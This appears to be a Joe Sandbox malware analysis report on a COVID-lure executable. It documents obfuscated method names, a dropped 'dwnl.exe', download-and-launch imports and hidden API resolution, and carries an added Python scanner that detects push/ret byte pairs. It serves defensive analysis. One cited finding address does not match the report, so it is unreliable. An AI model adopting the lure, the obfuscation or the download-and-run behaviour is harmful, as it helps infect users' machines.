Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_07C13D01 push esi; ret 0_2_07C13D07
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0813896E push cs; retf 0_2_0813896F
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08135998 push eax; iretd 0_2_08135999
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 22_2_001881A4 push eax; iretd 22_2_001881BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 23_2_002281A4 push eax; iretd 23_2_002281BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 24_2_000A81A4 push eax; iretd 24_2_000A81BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 25_2_002381A4 push eax; iretd 25_2_002381BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 27_2_000E81A4 push eax; iretd 27_2_000E81BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040FCF0 push eax; ret 28_2_0040FD1E
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_006581A4 push eax; iretd 28_2_006581BF
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142CF30 push es; ret 33_2_0142CF40
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665EC58 pushad ; retf 33_2_0665ECAD
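What the "push ...; ret / retf / iretd" findings above are looking for, as an added example that is not part of the Joe Sandbox report and not code from the sample: a PUSH writes a value to the stack and a return-type instruction then pops it into EIP, which transfers control without a visible call or jmp. The scanner below flags a single-byte PUSH immediately followed by a return-type opcode in raw code bytes. The sandbox's own signature works on disassembled functions, and the push and the ret it reports need not be adjacent (the 0_2_00A381A4 finding ends at 0_2_00A381BF, 27 bytes later), so this adjacent-pair check is narrower than the report's. The byte buffer and base address are constructed for the example.

```python
from typing import List, Tuple

# Single-byte x86 PUSH opcodes in 32-bit mode, including the segment-register
# and PUSHAD forms that the report's findings name.
PUSH_OPCODES = {
    0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
    0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
    0x06: "push es",  0x0E: "push cs",  0x16: "push ss",  0x1E: "push ds",
    0x60: "pushad",
}

# Return-type opcodes: near return, far return and IRET (decoded as iretd in
# 32-bit mode). Each pops EIP from the stack the preceding PUSH just wrote.
RET_OPCODES = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def find_push_ret(code: bytes, base: int = 0) -> List[Tuple[int, str]]:
    """Return (virtual address, mnemonic pair) for every PUSH byte that is
    immediately followed by a return-type byte in `code` loaded at `base`."""
    hits = []
    for i in range(len(code) - 1):
        push = PUSH_OPCODES.get(code[i])
        ret = RET_OPCODES.get(code[i + 1])
        if push and ret:
            hits.append((base + i, f"{push}; {ret}"))
    return hits


# Constructed buffer: an ordinary prologue (push ebp; mov ebp, esp) that must
# not be flagged, then three of the pairs the report lists, separated by nops.
SAMPLE_CODE = bytes([
    0x55, 0x8B, 0xEC,   # push ebp; mov ebp, esp   (legitimate prologue)
    0x90, 0x90,         # nop; nop
    0x06, 0xC3,         # push es; ret
    0x90,               # nop
    0x60, 0xCB,         # pushad; retf
    0x90,               # nop
    0x50, 0xCF,         # push eax; iretd
])
SAMPLE_BASE = 0x0142CF30   # constructed base address for the buffer

if __name__ == "__main__":
    for va, pair in find_push_ret(SAMPLE_CODE, SAMPLE_BASE):
        print(f"{va:08X}  {pair}")
```

A hit is weak evidence on its own: these two-byte sequences also occur inside data, and in a managed assembly the sandbox disassembles bytes that may be IL or metadata rather than native code. Before treating a hit as deliberate control-flow obfuscation, confirm the address lies in an executable section of native code and that the ret is actually reached.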
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, 28_2_00407D38
Source: initial sample Static PE information: section name: .text entropy: 7.82377359476
Source: UK COVID UPDATES AND ENTITLEMENT.exe, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe File created: C:\Users\user\AppData\Local\Temp\dwnl.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Contains functionality to download and launch executables
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, 28_2_00407D38
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX
